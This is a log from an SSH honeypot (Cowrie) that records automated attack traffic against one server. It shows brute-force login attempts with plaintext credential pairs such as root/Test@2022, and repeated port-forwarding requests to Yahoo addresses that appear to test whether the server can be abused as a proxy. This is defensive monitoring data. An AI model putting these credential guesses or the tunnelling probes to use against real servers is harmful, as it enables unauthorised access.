{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T00:58:32.174025Z","src_ip":"212.227.235.229","session":"86aef0b0527f"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:58:32.211026Z","src_ip":"213.209.150.239","session":"12a5749c4dc5"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":64554,"dst_ip":"1.2.3.4","dst_port":22,"session":"ffbac5311e66","protocol":"ssh","message":"New connection: 213.209.150.239:64554 (1.2.3.4:22) [session: ffbac5311e66]","sensor":"my-vps","timestamp":"2025-08-26T00:58:32.257094Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:58:32.257750Z","src_ip":"213.209.150.239","session":"ffbac5311e66"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:58:32.305081Z","src_ip":"213.209.150.239","session":"ffbac5311e66"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:58:32.539642Z","src_ip":"213.209.150.239","session":"ffbac5311e66"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.20","dst_port":80,"src_ip":"213.209.150.239","src_port":29889,"message":"direct-tcp connection request to 74.6.231.20:80 from 127.0.0.1:29889","sensor":"my-vps","timestamp":"2025-08-26T00:58:32.587550Z","session":"ffbac5311e66"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.20","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.20:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:58:32.634799Z","src_ip":"213.209.150.239","session":"ffbac5311e66"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"213.209.150.239","src_port":10387,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:10387","sensor":"my-vps","timestamp":"2025-08-26T00:58:32.769492Z","session":"ffbac5311e66"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:58:32.816885Z","src_ip":"213.209.150.239","session":"ffbac5311e66"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:58:32.864823Z","src_ip":"213.209.150.239","session":"ffbac5311e66"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":64592,"dst_ip":"1.2.3.4","dst_port":22,"session":"3745297a7cac","protocol":"ssh","message":"New connection: 213.209.150.239:64592 (1.2.3.4:22) [session: 3745297a7cac]","sensor":"my-vps","timestamp":"2025-08-26T00:58:32.920352Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:58:32.921037Z","src_ip":"213.209.150.239","session":"3745297a7cac"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:58:32.977647Z","src_ip":"213.209.150.239","session":"3745297a7cac"}
{"eventid":"cowrie.login.failed","username":"shalini","password":"shalini123","message":"login attempt [shalini/shalini123] failed","sensor":"my-vps","timestamp":"2025-08-26T00:58:33.164143Z","src_ip":"212.227.235.229","session":"86aef0b0527f"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:58:33.260630Z","src_ip":"213.209.150.239","session":"3745297a7cac"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.25","dst_port":80,"src_ip":"213.209.150.239","src_port":17457,"message":"direct-tcp connection request to 74.6.143.25:80 from 127.0.0.1:17457","sensor":"my-vps","timestamp":"2025-08-26T00:58:33.318421Z","session":"3745297a7cac"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.25","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.25:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:58:33.375474Z","src_ip":"213.209.150.239","session":"3745297a7cac"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"src_ip":"213.209.150.239","src_port":29773,"message":"direct-tcp connection request to 2001:4998:24:120d::1:0:80 from 127.0.0.1:29773","sensor":"my-vps","timestamp":"2025-08-26T00:58:33.531039Z","session":"3745297a7cac"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:0:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:58:33.587777Z","src_ip":"213.209.150.239","session":"3745297a7cac"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:58:33.645150Z","src_ip":"213.209.150.239","session":"3745297a7cac"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":64647,"dst_ip":"1.2.3.4","dst_port":22,"session":"c68694b3aef3","protocol":"ssh","message":"New connection: 213.209.150.239:64647 (1.2.3.4:22) [session: c68694b3aef3]","sensor":"my-vps","timestamp":"2025-08-26T00:58:33.700595Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:58:33.701262Z","src_ip":"213.209.150.239","session":"c68694b3aef3"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:58:33.758024Z","src_ip":"213.209.150.239","session":"c68694b3aef3"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:58:34.039875Z","src_ip":"213.209.150.239","session":"c68694b3aef3"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.26","dst_port":80,"src_ip":"213.209.150.239","src_port":25067,"message":"direct-tcp connection request to 74.6.143.26:80 from 127.0.0.1:25067","sensor":"my-vps","timestamp":"2025-08-26T00:58:34.097352Z","session":"c68694b3aef3"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.26","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.26:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:58:34.154021Z","src_ip":"213.209.150.239","session":"c68694b3aef3"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"src_ip":"213.209.150.239","src_port":27245,"message":"direct-tcp connection request to 2001:4998:24:120d::1:1:80 from 127.0.0.1:27245","sensor":"my-vps","timestamp":"2025-08-26T00:58:34.306818Z","session":"c68694b3aef3"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:58:34.363321Z","src_ip":"213.209.150.239","session":"c68694b3aef3"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:58:34.420663Z","src_ip":"213.209.150.239","session":"c68694b3aef3"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":64697,"dst_ip":"1.2.3.4","dst_port":22,"session":"c72ee5dc3168","protocol":"ssh","message":"New connection: 213.209.150.239:64697 (1.2.3.4:22) [session: c72ee5dc3168]","sensor":"my-vps","timestamp":"2025-08-26T00:58:34.476523Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:58:34.477355Z","src_ip":"213.209.150.239","session":"c72ee5dc3168"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:58:34.534473Z","src_ip":"213.209.150.239","session":"c72ee5dc3168"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:58:34.818016Z","src_ip":"213.209.150.239","session":"c72ee5dc3168"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.163","dst_port":80,"src_ip":"213.209.150.239","src_port":17745,"message":"direct-tcp connection request to 98.137.11.163:80 from 127.0.0.1:17745","sensor":"my-vps","timestamp":"2025-08-26T00:58:34.875829Z","session":"c72ee5dc3168"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.163","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.163:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:58:34.932569Z","src_ip":"213.209.150.239","session":"c72ee5dc3168"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"213.209.150.239","src_port":27785,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:27785","sensor":"my-vps","timestamp":"2025-08-26T00:58:35.087044Z","session":"c72ee5dc3168"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:58:35.143842Z","src_ip":"213.209.150.239","session":"c72ee5dc3168"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:58:35.201493Z","src_ip":"213.209.150.239","session":"c72ee5dc3168"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":64735,"dst_ip":"1.2.3.4","dst_port":22,"session":"2eb71894a319","protocol":"ssh","message":"New connection: 213.209.150.239:64735 (1.2.3.4:22) [session: 2eb71894a319]","sensor":"my-vps","timestamp":"2025-08-26T00:58:35.247868Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:58:35.248536Z","src_ip":"213.209.150.239","session":"2eb71894a319"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:58:35.296028Z","src_ip":"213.209.150.239","session":"2eb71894a319"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:58:35.531616Z","src_ip":"213.209.150.239","session":"2eb71894a319"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.26","dst_port":80,"src_ip":"213.209.150.239","src_port":1227,"message":"direct-tcp connection request to 74.6.143.26:80 from 127.0.0.1:1227","sensor":"my-vps","timestamp":"2025-08-26T00:58:35.579885Z","session":"2eb71894a319"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.26","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.26:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:58:35.627991Z","src_ip":"213.209.150.239","session":"2eb71894a319"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"213.209.150.239","src_port":11612,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:11612","sensor":"my-vps","timestamp":"2025-08-26T00:58:35.765597Z","session":"2eb71894a319"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:58:35.812940Z","src_ip":"213.209.150.239","session":"2eb71894a319"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:58:35.860939Z","src_ip":"213.209.150.239","session":"2eb71894a319"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":64786,"dst_ip":"1.2.3.4","dst_port":22,"session":"93914c998f00","protocol":"ssh","message":"New connection: 213.209.150.239:64786 (1.2.3.4:22) [session: 93914c998f00]","sensor":"my-vps","timestamp":"2025-08-26T00:58:35.907013Z"}
